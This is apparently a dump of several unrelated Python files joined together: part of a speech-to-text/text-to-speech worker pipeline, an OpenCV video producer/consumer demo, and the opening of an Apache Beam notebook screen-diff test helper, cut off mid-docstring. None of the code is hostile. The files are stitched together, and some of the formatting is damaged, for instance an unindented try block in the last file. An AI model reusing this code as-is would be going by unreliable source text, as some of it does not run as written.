                break
            if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
                qLogOutput('stt_core__: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
            if (mode_get == 'PASS'):
                #sttcore_last = time.time()
                cn_s.put(['PASS', ''])
            else:
                sttcore_busy = True
                result = 'OK'
                path = qPathWav
                files = glob.glob(path + '*')
                if (len(files) > 0):
                    qBusySet(qBusySTT, True)
                    if (str(micDev) == 'file'):
                        for f in files:
                            qLogOutput(f)
                    # Wait for the controller (and optionally the input
                    # worker) to go idle before consuming audio.
                    qBusyCheck(qBusyCtrl , 3)
                    #qBusyCheck(qBusySTT , 3)
                    #qBusyCheck(qBusyTTS , 3)
                    #qBusyCheck(qBusyPlay , 3)
                    if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
                        qBusyCheck(qBusyInput , 3)
                # Re-scan: new recordings may have appeared while waiting.
                files = glob.glob(path + '*')
                if (len(files) > 0):
                    try:
                        for f in files:
                            file=f.replace('\\', '/')
                            # Claim each audio file via a rename round-trip
                            # (.wav -> .tmp.wav -> .wav, likewise .mp3) so
                            # concurrent pollers cannot pick up the same file.
                            if (file[-4:].lower() == '.wav' and file[-8:].lower() != '.tmp.wav'):
                                f1=file
                                f2=file[:-4] + '.tmp.wav'
                                try:
                                    os.rename(f1, f2)
                                    file=f2
                                except:
                                    pass
                            if (file[-4:].lower() == '.mp3' and file[-8:].lower() != '.tmp.mp3'):
                                f1=file
                                f2=file[:-4] + '.tmp.mp3'
                                try:
                                    os.rename(f1, f2)
                                    file=f2
                                except:
                                    pass
                            if (file[-8:].lower() == '.tmp.wav' or file[-8:].lower() == '.tmp.mp3'):
                                f1=file
                                f2=file[:-8] + file[-4:]
                                try:
                                    os.rename(f1, f2)
                                    file=f2
                                except:
                                    pass
                            fileId = file.replace(path, '')
                            fileId = fileId[:-4]
                            # Rolling 4-digit sequence number (0001..9999).
                            sttcore_seq += 1
                            if (sttcore_seq >= 10000):
                                sttcore_seq = 1
                            seq4 = '{:04}'.format(sttcore_seq)
                            seq2 = seq4[-2:]
                            wrkfile = qPathWork + 'sttcore.' + seq2 + '.wav'
                            if (os.path.exists(wrkfile)):
                                try:
                                    os.remove(wrkfile)
                                except:
                                    pass
                            # Normalize the audio to 16kHz/16bit/mono for the
                            # recognition engines (sox is an external tool).
                            sox = subprocess.Popen(['sox', '-q', file, '-r', '16000', '-b', '16', '-c', '1', wrkfile, ], \
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
                            sox.wait()
                            sox.terminate()
                            sox = None
                            # Keep the source file in batch mode; consume it live.
                            if (str(micDev) != 'file'):
                                os.remove(file)
                            if (os.path.exists(wrkfile)):
                                if (micDev == 'file'):
                                    qLogOutput('')
                                    qLogOutput('stt_core__:' + fileId + u' → ' + wrkfile[:-4])
                                sttcore_last = time.time()
                                stt_sub(seq4, fileId, runMode, micDev, wrkfile, )
                    except:
                        pass
                        result = 'NG'
                if (str(micDev) == 'file'):
                    # Batch (file) mode: report the outcome and stop scanning.
                    if (result == 'OK'):
                        cn_s.put(['END', ''])
                        time.sleep( 5.00)
                        break
                    else:
                        cn_s.put(['ERROR', ''])
                        time.sleep( 5.00)
                        break
                else:
                    cn_s.put([result, ''])
                sttcore_busy = False
                qBusySet(qBusySTT, False)
        # Idle pacing: poll slower when the request queue is empty.
        if (cn_r.qsize() == 0):
            time.sleep(0.25)
        else:
            time.sleep(0.10)
    qLogOutput('stt_core__:terminate')
    # Drain any messages left on the request queue before exiting.
    while (cn_r.qsize() > 0):
        try:
            cn_r_get = cn_r.get()
            mode_get = cn_r_get[0]
            data_get = cn_r_get[1]
            cn_r.task_done()
        except:
            pass
    qLogOutput('stt_core__:end')
def tts_sub(seq, fileId, runMode, micDev, file, txtText, ):
    """Queue one text file for speech synthesis, translating if needed.

    Leading 'ja,'/'en,' prefixes on ``txtText`` override the working
    language.  When the effective input/translate/output languages all
    match, the text is voiced directly; otherwise it is routed through the
    translator first and the translation is voiced.  The actual work is
    delegated to the '_speech_a3_all_api.py' subprocess; in file (batch)
    mode every 10th job (``seq`` ending in '0') is awaited synchronously.
    """
    global qApiInp
    global qApiTrn
    global qApiOut
    global qLangInp
    global qLangTrn
    global qLangTxt
    global qLangOut
    global qPathCtrl
    global qPathInp
    global qPathWav
    global qPathSTT
    global qPathTTS
    global qPathTRA
    global qPathPlay
    global qPathRec
    global qPathWork
    # Effective languages, possibly overridden by 'ja,'/'en,' prefixes.
    lang_in = qLangTxt
    lang_trn = qLangTrn
    lang_out = qLangOut
    while txtText[:3] in ('ja,', 'en,'):
        lang_in = lang_trn = lang_out = txtText[:2]
        txtText = txtText[3:]
    # Default routing: all stages disabled, playback off.
    inpInput = inpOutput = ''
    trnInput = trnOutput = ''
    txtInput = txtOutput = ''
    outInput = outOutput = ''
    inpPlay = 'off'
    txtPlay = 'off'
    outPlay = 'off'
    if (lang_in == lang_trn) and (lang_in == lang_out):
        # Single language throughout: synthesize the text directly.
        txtInput = file
        txtOutput = qPathPlay + fileId + '.' + lang_in + '.' + lang_in + '.mp3'
    else:
        # Languages differ: translate first, then voice the translation.
        trnInput = file
        trnOutput = qPathTRA + fileId + '.' + lang_in + '.' + lang_trn[:2] + '.tts.translate.txt'
        outInput = trnOutput
        outOutput = qPathPlay + fileId + '.' + lang_out + '.voice.mp3'
    if qApiOut == 'none':
        # Speech synthesis disabled: suppress the audio outputs.
        txtOutput = ''
        outOutput = ''
    api = subprocess.Popen(
        ['python', '_speech_a3_all_api.py',
         runMode, micDev, qApiInp, qApiTrn, qApiOut, qLangTxt, qLangTrn, qLangTxt, qLangOut,
         'TTS' + str(seq), fileId, inpInput, inpOutput, trnInput, trnOutput,
         txtInput, txtOutput, outInput, outOutput,
         inpPlay, txtPlay, outPlay, ],
        )
    time.sleep(2.00)
    if str(micDev) == 'file':
        if seq[-1:] == '0':
            # Batch mode: wait on every 10th job to bound process fan-out.
            api.wait()
            api.terminate()
            api = None
            time.sleep(5.00)
# Shared state for the text-to-speech worker (proc_ttscore); read by
# external watchdogs to monitor thread health.
ttscore_start = 0      # time.time() when proc_ttscore started
ttscore_beat = 0       # timestamp of the most recent loop iteration
ttscore_busy = False   # True while a text file is being processed
ttscore_last = 0       # timestamp of the last synthesis job
ttscore_seq = 0        # rolling job sequence number (wraps at 10000)
def proc_ttscore(cn_r, cn_s, ):
    # TTS worker thread: polls qPathTTS for queued .txt files, claims each one
    # via a rename dance, copies its text into a work file and hands it to
    # tts_sub().  Receives commands on cn_r, reports results on cn_s.
    # NOTE(review): indentation reconstructed from a whitespace-mangled dump.
    global qPathCtrl
    global qPathInp
    global qPathWav
    global qPathSTT
    global qPathTTS
    global qPathTRA
    global qPathPlay
    global qPathRec
    global qPathWork
    global qBusyCtrl
    global qBusyInput
    global qBusySTT
    global qBusyTTS
    global qBusyPlay
    global ttscore_start
    global ttscore_beat
    global ttscore_busy
    global ttscore_last
    global ttscore_seq
    qLogOutput('tts_core__:init')
    # The first four queue items are the startup parameters, in this order.
    runMode = cn_r.get()
    micDev = cn_r.get()
    micType = cn_r.get()
    micGuide = cn_r.get()
    cn_r.task_done()
    qLogOutput('tts_core__:runMode =' + str(runMode ))
    qLogOutput('tts_core__:micDev =' + str(micDev ))
    qLogOutput('tts_core__:micType =' + str(micType ))
    qLogOutput('tts_core__:micGuide=' + str(micGuide))
    qLogOutput('tts_core__:start')
    ttscore_start=time.time()
    while (True):
        ttscore_beat = time.time()
        if (cn_r.qsize() > 0):
            cn_r_get = cn_r.get()
            mode_get = cn_r_get[0]
            data_get = cn_r_get[1]
            cn_r.task_done()
            # A None command is the shutdown signal from the supervisor.
            if (mode_get is None):
                qLogOutput('tts_core__:None=break')
                break
            if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
                qLogOutput('tts_core__: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
            if (mode_get == 'PASS'):
                # Liveness probe: echo it back without doing any work.
                #ttscore_last = time.time()
                cn_s.put(['PASS', ''])
            else:
                ttscore_busy = True
                result = 'OK'
                path = qPathTTS
                files = glob.glob(path + '*')
                if (len(files) > 0):
                    qBusySet(qBusyTTS, True)
                    if (str(micDev) == 'file'):
                        for f in files:
                            qLogOutput(f)
                    #qBusyCheck(qBusyCtrl , 3)
                    #qBusyCheck(qBusyTTS , 3)
                    #qBusyCheck(qBusySTT , 3)
                    #qBusyCheck(qBusyPlay , 3)
                    # Wait for the input side to go idle before speaking, to
                    # avoid the synthesized audio being re-captured.
                    if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
                        qBusyCheck(qBusyInput , 3)
                    # Re-scan: the wait above may have changed the folder.
                    files = glob.glob(path + '*')
                    if (len(files) > 0):
                        try:
                            for f in files:
                                file=f.replace('\\', '/')
                                # Claim the .txt by renaming it to .tmp.txt …
                                if (file[-4:].lower() == '.txt' and file[-8:].lower() != '.tmp.txt'):
                                    f1=file
                                    f2=file[:-4] + '.tmp.txt'
                                    try:
                                        os.rename(f1, f2)
                                        file=f2
                                    except:
                                        pass
                                # … then rename it back; a failure here means
                                # another worker owns the file.
                                if (file[-8:].lower() == '.tmp.txt'):
                                    f1=file
                                    f2=file[:-8] + file[-4:]
                                    try:
                                        os.rename(f1, f2)
                                        file=f2
                                    except:
                                        pass
                                fileId = file.replace(path, '')
                                fileId = fileId[:-4]
                                # Rolling sequence number drives the work-file
                                # name (last two digits → 100 reusable slots).
                                ttscore_seq += 1
                                if (ttscore_seq >= 10000):
                                    ttscore_seq = 1
                                seq4 = '{:04}'.format(ttscore_seq)
                                seq2 = seq4[-2:]
                                wrkfile = qPathWork + 'ttscore.' + seq2 + '.txt'
                                if (os.path.exists(wrkfile)):
                                    try:
                                        os.remove(wrkfile)
                                    except:
                                        pass
                                # Collapse the source text to one line.
                                txt = ''
                                try:
                                    rt = codecs.open(file, 'r', 'utf-8')
                                    for t in rt:
                                        txt = (txt + ' ' + str(t)).strip()
                                    rt.close
                                    rt = None
                                except:
                                    rt = None
                                txt = str(txt).strip()
                                if (txt != '' and txt != '!'):
                                    try:
                                        w = codecs.open(wrkfile, 'w', 'utf-8')
                                        w.write(txt)
                                        w.close()
                                        w = None
                                    except:
                                        w = None
                                # Live mode consumes the request file; batch
                                # mode keeps it for inspection.
                                if (str(micDev) != 'file'):
                                    os.remove(file)
                                if (os.path.exists(wrkfile)):
                                    if (micDev == 'file'):
                                        qLogOutput('')
                                    qLogOutput('tts_core__:' + fileId + u' → ' + wrkfile)
                                    ttscore_last = time.time()
                                    tts_sub(seq4, fileId, runMode, micDev, wrkfile, txt, )
                        except:
                            pass
                            result = 'NG'
                # Batch mode ends after one pass; live mode keeps serving.
                if (str(micDev) == 'file'):
                    if (result == 'OK'):
                        cn_s.put(['END', ''])
                        time.sleep( 5.00)
                        break
                    else:
                        cn_s.put(['ERROR', ''])
                        time.sleep( 5.00)
                        break
                else:
                    cn_s.put([result, ''])
                ttscore_busy = False
                qBusySet(qBusyTTS, False)
        # Idle back-off: poll slower when the command queue is empty.
        if (cn_r.qsize() == 0):
            time.sleep(0.25)
        else:
            time.sleep(0.10)
    qLogOutput('tts_core__:terminate')
    # Drain any remaining commands so join()/task_done accounting is clean.
    while (cn_r.qsize() > 0):
        try:
            cn_r_get = cn_r.get()
            mode_get = cn_r_get[0]
            data_get = cn_r_get[1]
            cn_r.task_done()
        except:
            pass
    qLogOutput('tts_core__:end')
def main_init(runMode, micDev, ):
    # Prepare the working folders and reset every busy/control flag.
    # In live mode (micDev != 'file') the transient folders are cleared;
    # in batch mode the input/TTS folders are preserved.
    global qPathCtrl
    global qPathInp
    global qPathWav
    global qPathSTT
    global qPathTTS
    global qPathTRA
    global qPathPlay
    global qPathRec
    global qPathWork
    global qBusyCtrl
    global qBusyInput
    global qBusySTT
    global qBusyTTS
    global qBusyPlay
    global qCtrlBgm
    global qCtrlWeb
    global qCtrlChatting
    global qCtrlKnowledge
    global qCtrlVision
    global qCtrlRecognize
    global qCtrlTranslate
    qMakeDirs('temp/_log/', False)
    qMakeDirs('temp/_cache/', False)
    file_mode = (str(micDev) == 'file')
    # (folder, clear-flag in live mode, clear-flag in batch/file mode)
    folder_plan = (
        (qPathCtrl, True,  True ),
        (qPathInp,  True,  False),
        (qPathWav,  True,  True ),
        (qPathSTT,  True,  True ),
        (qPathTTS,  True,  False),
        (qPathTRA,  True,  True ),
        (qPathPlay, True,  True ),
        (qPathRec,  False, False),
        (qPathWork, True,  True ),
    )
    for folder, live_flag, batch_flag in folder_plan:
        qMakeDirs(folder, batch_flag if file_mode else live_flag)
    # Start with every busy/feature flag lowered.
    for flag_file in (qBusyCtrl, qBusyInput, qBusySTT, qBusyTTS, qBusyPlay,
                      qCtrlBgm, qCtrlWeb, qCtrlChatting, qCtrlKnowledge,
                      qCtrlVision, qCtrlRecognize, qCtrlTranslate):
        qBusySet(flag_file, False)
# Supervisor book-keeping for the __main__ loop (mirrors the *_core state).
main_start=0      # epoch seconds when the main loop started
main_beat =0      # last main-loop iteration timestamp
main_busy =False  # not referenced in this chunk; kept for symmetry
main_last =0      # not referenced in this chunk; kept for symmetry
if (__name__ == '__main__'):
    # Entry point: parse positional arguments, spawn the capture/playback
    # helper processes, then run and supervise the three worker threads
    # (control / stt / tts) with heart-beat timeouts.
    # NOTE(review): indentation reconstructed from a whitespace-mangled dump.
    #global main_beat
    #global sttcore_beat
    qLogOutput('___main___:init')
    qLogOutput('___main___:exsample.py runMode, api..., lang..., micDev, micType, micGuide, micLevel, path..., ')
    #runMode handsfree, translator, speech, ...,
    # knowledge, learning, number,
    #api free, google, watson, azure, nict, winos, macos, docomo,
    #lang ja, en, fr, kr...
    #micDev num or file
    #micType usb or bluetooth
    #micGuide off, on, display, sound
    # Defaults, overridden below by positional command-line arguments.
    runMode = 'handsfree'
    micDev = '0'
    micType = 'bluetooth'
    micGuide = 'on'
    micLevel = '0'
    if (len(sys.argv) >= 2):
        runMode = str(sys.argv[1]).lower()
    if (len(sys.argv) >= 3):
        micDev = str(sys.argv[2]).lower()
        # Batch mode (input from files): no microphone guidance.
        if (str(micDev) == 'file'):
            micGuide = 'off'
    if (len(sys.argv) >= 4):
        micType = str(sys.argv[3]).lower()
    if (len(sys.argv) >= 5):
        micGuide = str(sys.argv[4]).lower()
    if (len(sys.argv) >= 6):
        p = str(sys.argv[5]).lower()
        if (p.isdigit() and p != '0'):
            micLevel = p
    if (len(sys.argv) >= 7):
        qApiInp = str(sys.argv[6]).lower()
        # Cloud engines serve all three roles; otherwise fall back to 'free'.
        if (qApiInp == 'google') or (qApiInp == 'watson') \
        or (qApiInp == 'azure') or (qApiInp == 'nict'):
            qApiTrn = qApiInp
            qApiOut = qApiInp
        else:
            qApiTrn = 'free'
            qApiOut = 'free'
        if (qApiInp == 'nict'):
            #qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
            qLangTrn = 'en,fr,es,id,zh,ko,'
            qLangOut = qLangTrn[:2]
    if (len(sys.argv) >= 8):
        qApiTrn = str(sys.argv[7]).lower()
    if (len(sys.argv) >= 9):
        qApiOut = str(sys.argv[8]).lower()
    if (len(sys.argv) >= 10):
        qLangInp = str(sys.argv[9]).lower()
        qLangTxt = qLangInp
    if (len(sys.argv) >= 11):
        qLangTrn = str(sys.argv[10]).lower()
        qLangOut = qLangTrn[:2]
    if (len(sys.argv) >= 12):
        qLangTxt = str(sys.argv[11]).lower()
    if (len(sys.argv) >= 13):
        qLangOut = str(sys.argv[12]).lower()
    qLogOutput('')
    qLogOutput('___main___:runMode =' + str(runMode ))
    qLogOutput('___main___:micDev =' + str(micDev ))
    qLogOutput('___main___:micType =' + str(micType ))
    qLogOutput('___main___:micGuide =' + str(micGuide ))
    qLogOutput('___main___:micLevel =' + str(micLevel ))
    qLogOutput('___main___:qApiInp =' + str(qApiInp ))
    qLogOutput('___main___:qApiTrn =' + str(qApiTrn ))
    qLogOutput('___main___:qApiOut =' + str(qApiOut ))
    qLogOutput('___main___:qLangInp =' + str(qLangInp ))
    qLogOutput('___main___:qLangTrn =' + str(qLangTrn ))
    qLogOutput('___main___:qLangTxt =' + str(qLangTxt ))
    qLogOutput('___main___:qLangOut =' + str(qLangOut ))
    main_init(runMode, micDev, )
    if (True):
        qLogOutput('')
        # Microphone / file capture helper process.
        voice2wav = subprocess.Popen(['python', '_speech_a3_voice2wav.py', \
            runMode, micDev, micType, micGuide, micLevel, \
            ], )
        #], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, )
        #], stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
        time.sleep(2.00)
        if (str(micDev) == 'file'):
            # Batch mode: capture finishes on its own; wait and reap it.
            voice2wav.wait()
            voice2wav.terminate()
            voice2wav = None
        qLogOutput('')
        # Audio playback helper process.
        playvoice = subprocess.Popen(['python', '_speech_a3_playvoice.py', \
            runMode, micDev, micType, micGuide, micLevel, \
            ], )
        #], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, )
        #], stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
        time.sleep(2.00)
    qLogOutput('')
    qLogOutput('___main___:start')
    main_start = time.time()
    main_beat = 0
    # Per-worker command/response queues plus heart-beat and idle counters.
    control_s = queue.Queue()
    control_r = queue.Queue()
    control_proc = None
    control_beat = 0
    control_pass = 0
    sttcore_s = queue.Queue()
    sttcore_r = queue.Queue()
    sttcore_proc = None
    sttcore_beat = 0
    sttcore_pass = 0
    ttscore_s = queue.Queue()
    ttscore_r = queue.Queue()
    ttscore_proc = None
    ttscore_beat = 0
    ttscore_pass = 0
    while (True):
        main_beat = time.time()
        # check sttcore_last and ttscore_last
        # Batch mode exits after 240s of inactivity on both STT and TTS.
        if (str(micDev) == 'file'):
            if (sttcore_last == 0):
                sttcore_last = time.time()
            if (ttscore_last == 0):
                ttscore_last = time.time()
            sec1 = int(time.time() - sttcore_last)
            sec2 = int(time.time() - ttscore_last)
            if (sec1 > 240 and sec2 > 240):
                break
        # Thread timeout check
        # A worker whose heart-beat stalls >60s is asked to stop and will be
        # restarted by the "Thread start" section below (live mode only).
        if (control_beat != 0):
            if (str(micDev) != 'file'):
                sec = int(time.time() - control_beat)
                if (sec > 60):
                    qLogOutput('___main___:control_proc 60s')
                    qLogOutput('___main___:control_proc break')
                    control_s.put([None, None])
                    time.sleep(3.00)
                    control_proc = None
                    control_beat = 0
                    control_pass = 0
        if (sttcore_beat != 0):
            if (str(micDev) != 'file'):
                sec = int(time.time() - sttcore_beat)
                if (sec > 60):
                    qLogOutput('___main___:sttcore_proc 60s')
                    qLogOutput('___main___:sttcore_proc break')
                    sttcore_s.put([None, None])
                    time.sleep(3.00)
                    sttcore_proc = None
                    sttcore_beat = 0
                    sttcore_pass = 0
        if (ttscore_beat != 0):
            if (str(micDev) != 'file'):
                sec = int(time.time() - ttscore_beat)
                if (sec > 60):
                    qLogOutput('___main___:ttscore_proc 60s')
                    qLogOutput('___main___:ttscore_proc break')
                    ttscore_s.put([None, None])
                    time.sleep(3.00)
                    ttscore_proc = None
                    ttscore_beat = 0
                    ttscore_pass = 0
        # Thread start
        # (Re)start any worker that is not running; the first four queue
        # items are its startup parameters, then a 'START' command.
        if (control_proc is None):
            while (control_s.qsize() > 0):
                dummy = control_s.get()
            while (control_r.qsize() > 0):
                dummy = control_r.get()
            control_proc = threading.Thread(target=proc_control, args=(control_s,control_r,))
            control_proc.daemon = True
            control_s.put(runMode )
            control_s.put(micDev )
            control_s.put(micType )
            control_s.put(micGuide)
            control_proc.start()
            time.sleep(1.00)
            control_s.put(['START', ''])
        if (sttcore_proc is None):
            while (sttcore_s.qsize() > 0):
                dummy = sttcore_s.get()
            while (sttcore_r.qsize() > 0):
                dummy = sttcore_r.get()
            sttcore_proc = threading.Thread(target=proc_sttcore, args=(sttcore_s,sttcore_r,))
            sttcore_proc.daemon = True
            sttcore_s.put(runMode )
            sttcore_s.put(micDev )
            sttcore_s.put(micType )
            sttcore_s.put(micGuide)
            sttcore_proc.start()
            time.sleep(1.00)
            sttcore_s.put(['START', ''])
        if (ttscore_proc is None):
            while (ttscore_s.qsize() > 0):
                dummy = ttscore_s.get()
            while (ttscore_r.qsize() > 0):
                dummy = ttscore_r.get()
            ttscore_proc = threading.Thread(target=proc_ttscore, args=(ttscore_s,ttscore_r,))
            ttscore_proc.daemon = True
            ttscore_s.put(runMode )
            ttscore_s.put(micDev )
            ttscore_s.put(micType )
            ttscore_s.put(micGuide)
            ttscore_proc.start()
            time.sleep(1.00)
            ttscore_s.put(['START', ''])
        # processing
        # Poll each worker with 'PROC' when idle; after 50 consecutive idle
        # polls send a 'PASS' liveness probe.
        if (control_r.qsize() == 0 and control_s.qsize() == 0):
            control_s.put(['PROC', ''])
            control_pass += 1
        else:
            control_pass = 0
        if (control_pass > 50):
            control_s.put(['PASS', ''])
            control_pass = 0
        break_flag = False
        while (control_r.qsize() > 0):
            control_get = control_r.get()
            control_res = control_get[0]
            control_dat = control_get[1]
            control_r.task_done()
            if (control_res == 'END'):
                break_flag = True
            if (control_res == 'ERROR'):
                break_flag = True
        if (break_flag == True):
            break
        if (sttcore_r.qsize() == 0 and sttcore_s.qsize() == 0):
            sttcore_s.put(['PROC', ''])
            sttcore_pass += 1
        else:
            sttcore_pass = 0
        if (sttcore_pass > 50):
            sttcore_s.put(['PASS', ''])
            sttcore_pass = 0
        while (sttcore_r.qsize() > 0):
            sttcore_get = sttcore_r.get()
            sttcore_res = sttcore_get[0]
            sttcore_dat = sttcore_get[1]
            sttcore_r.task_done()
        if (ttscore_r.qsize() == 0 and ttscore_s.qsize() == 0):
            ttscore_s.put(['PROC', ''])
            ttscore_pass += 1
        else:
            ttscore_pass = 0
        if (ttscore_pass > 50):
            ttscore_s.put(['PASS', ''])
            ttscore_pass = 0
        while (ttscore_r.qsize() > 0):
            ttscore_get = ttscore_r.get()
            ttscore_res = ttscore_get[0]
            ttscore_dat = ttscore_get[1]
            ttscore_r.task_done()
        time.sleep(0.05)
    qLogOutput('')
    qLogOutput('___main___:terminate')
    # Shutdown: signal the workers, kill the helper processes, join, and
    # lower the busy flags.
    try:
        control_s.put( [None, None] )
        sttcore_s.put( [None, None] )
        ttscore_s.put( [None, None] )
        time.sleep(3.00)
    except:
        pass
    if (not voice2wav is None):
        voice2wav.terminate()
        voice2wav = None
    if (not playvoice is None):
        playvoice.terminate()
        playvoice = None
    try:
        control_proc.join()
        sttcore_proc.join()
        ttscore_proc.join()
    except:
        pass
    qBusySet(qBusyCtrl, False)
    qBusySet(qBusyTTS, False)
    qBusySet(qBusySTT, False)
    qLogOutput('___main___:bye!')
|
queue_process.py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: He Ye (Alex)
# Date: 2019-11-13
import argparse
import cv2
import time
from multiprocessing import Process, Queue
# Default V4L2 device path (informational; --vdev actually takes an index).
VDEV = "/dev/video0"
def showVideoInfo(vhandle):
    """Print FPS and frame size of an opened capture and grab its first frame.

    Returns:
        (vhandle, fps, size, firstframe) on success, ``None`` on any failure.
    """
    try:
        fps = vhandle.get(cv2.CAP_PROP_FPS)
        #count = vhandle.get(cv2.CAP_PROP_FRAME_COUNT)
        size = (int(vhandle.get(cv2.CAP_PROP_FRAME_WIDTH)),
                int(vhandle.get(cv2.CAP_PROP_FRAME_HEIGHT)))
        ret, firstframe = vhandle.read()
        if ret:
            print("FPS: %.2f" % fps)
            #print("COUNT: %.2f" % count)
            print("WIDTH: %d" % size[0])
            print("HEIGHT: %d" % size[1])
            return vhandle, fps, size, firstframe
        print("Video can not read!")
    except Exception as exc:
        # Bug fix: the original bare `except:` body was the bare string
        # expression "Error in showVideoInfo" — a no-op that silently
        # swallowed every error.  Report it instead.
        print("Error in showVideoInfo: %s" % exc)
    # Explicit on all failure paths (previously an implicit fall-through).
    return None
def setVideoInfo(vhandle, fps, width, height):
    """Apply the requested FPS to the capture handle.

    NOTE(review): ``width``/``height`` are accepted but never applied —
    presumably CAP_PROP_FRAME_WIDTH/HEIGHT were intended; kept unused to
    preserve behavior.
    """
    try:
        vhandle.set(cv2.CAP_PROP_FPS, fps)
    except Exception as exc:
        # Bug fix: bare `except:` with a no-op string literal swallowed
        # every error silently; report it instead.
        print("Error in setVideoInfo: %s" % exc)
def consumer(qf, id):
    """Display frames taken from *qf* in a window named after *id*.

    Runs until a ``None`` sentinel is received; the sentinel is re-queued so
    every sibling consumer process also sees it and shuts down.
    """
    print("Consumer %d start" %(id))
    while (frame := qf.get()) is not None:
        cv2.imshow(str(id), frame)
        cv2.waitKey(1)
    qf.put(None)  # propagate the stop signal to the other consumers
    print("Consumer %d quit" %(id))
def producer(cap, qf):
    """Read frames from *cap*, preview them, and queue rotated copies.

    Sends a ``None`` sentinel and stops when 'q' is pressed in the preview
    window or when the capture stops delivering frames.
    """
    while (True):
        ret, frame = cap.read()
        if not ret:
            # Bug fix: `ret` was previously ignored, so a failed read left
            # `frame` as None and crashed cv2.imshow.  Treat it as
            # end-of-stream and signal the consumers instead.
            print("Producer: capture read failed, stopping")
            qf.put(None)
            break
        cv2.imshow("preview", frame)
        rotate_frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)
        #cv2.imshow("rotate", rotate_frame)
        qf.put(rotate_frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            print("Producer sent stop signal")
            qf.put(None)
            break
    print("Quit producer, Frame Queue Size: %d" %(qf.qsize()))
def main(args):
    """Open the video device and wire one producer with N display consumers."""
    vdev = args.vdev
    thread_number = args.consumers
    try:
        cap = cv2.VideoCapture(vdev)
    except Exception as exc:
        # Bug fix: the original bare `except:` body was a no-op string
        # literal, and execution then fell through to use the undefined
        # `cap`.  Report the error and bail out instead.
        print("Failed to open %s: %s" % (vdev, exc))
        return
    showVideoInfo(cap)
    qf = Queue(maxsize = 0)  # unbounded frame queue
    thread_list = []
    # One producer feeding the queue …
    pt = Process(target = producer, args = (cap, qf,))
    thread_list.append(pt)
    pt.start()
    # … and N consumers displaying from it.
    for i in range(thread_number):
        ct = Process(target = consumer, args = (qf, i, ))
        thread_list.append(ct)
        ct.start()
    print("Process numbers = %d" %(len(thread_list)))
    for t in thread_list:
        t.join()
    print("Finished Join")
    cap.release()
    cv2.destroyAllWindows()
if __name__ == '__main__':
    # Command-line entry point: --nc consumer count, --vdev capture index.
    parser = argparse.ArgumentParser()
    parser.add_argument("--nc", default=2, dest="consumers", help="number of consumer", type=int)
    parser.add_argument("--vdev", default=0, dest="vdev", help="video device id (/dev/videoX)", type=int)
    args = parser.parse_args()
    main(args)
|
screen_diff.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Module to conduct screen diff based notebook integration tests."""
# pytype: skip-file
from __future__ import absolute_import
import os
import platform
import threading
import unittest
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import pytest
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive.testing.integration import notebook_executor
try:
import chromedriver_binary # pylint: disable=unused-import
from needle.cases import NeedleTestCase
from needle.driver import NeedleChrome
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
_interactive_integration_ready = (
notebook_executor._interactive_integration_ready)
except ImportError:
_interactive_integration_ready = False
# Web elements are rendered differently on different platforms. List every
# platform that has golden screenshots checked in here.
_SUPPORTED_PLATFORMS = ['Darwin', 'Linux']
class ScreenDiffIntegrationTestEnvironment(object):
  """A test environment to conduct screen diff integration tests for notebooks.
  """
  def __init__(self, test_notebook_path, golden_dir, cleanup=True):
    # type: (str, str, bool) -> None
    assert _interactive_integration_ready, (
        '[interactive_test] dependency is not installed.')
    assert os.path.exists(golden_dir), '{} does not exist.'.format(golden_dir)
    assert os.path.isdir(golden_dir), '{} is not a directory.'.format(
        golden_dir)
    self._golden_dir = golden_dir
    self._notebook_executor = notebook_executor.NotebookExecutor(
        test_notebook_path)
    self._cleanup = cleanup
    # Populated by __enter__: test_id -> url of the executed notebook's HTML.
    self._test_urls = {}
    self._server = None

  def __enter__(self):
    """Executes the notebooks and serves their HTML output locally."""
    self._notebook_executor.execute()
    # Port 0 lets the OS pick a free port; base_url reports the real one.
    self._server = HTTPServer(('', 0), SimpleHTTPRequestHandler)

    def start_serving(server):
      server.serve_forever()

    # Daemon thread so an aborted test run cannot hang the process.
    threading.Thread(
        target=start_serving, args=[self._server], daemon=True).start()
    for test_id, output_path in\
        self._notebook_executor.output_html_paths.items():
      self._test_urls[test_id] = self.base_url + output_path
    return self

  def __exit__(self, exc_type, exc_value, traceback):
    """Cleans up the executor output (if configured) and stops the server."""
    if self._notebook_executor and self._cleanup:
      self._notebook_executor.cleanup()
    if self._server:

      def stop_serving(server):
        server.shutdown()

      # shutdown() must run off the serving thread, hence a helper thread.
      threading.Thread(
          target=stop_serving, args=[self._server], daemon=True).start()

  @property
  def base_url(self):
    """The base url where the locally started server serving HTMLs generated by
    notebook executions."""
    assert self._server, 'Server has not started.'
    host_n_port = self._server.server_address
    return 'http://{}:{}/'.format(host_n_port[0], host_n_port[1])

  @property
  def test_urls(self):
    """Mapping from test_id/execution_id to urls serving the output HTML pages
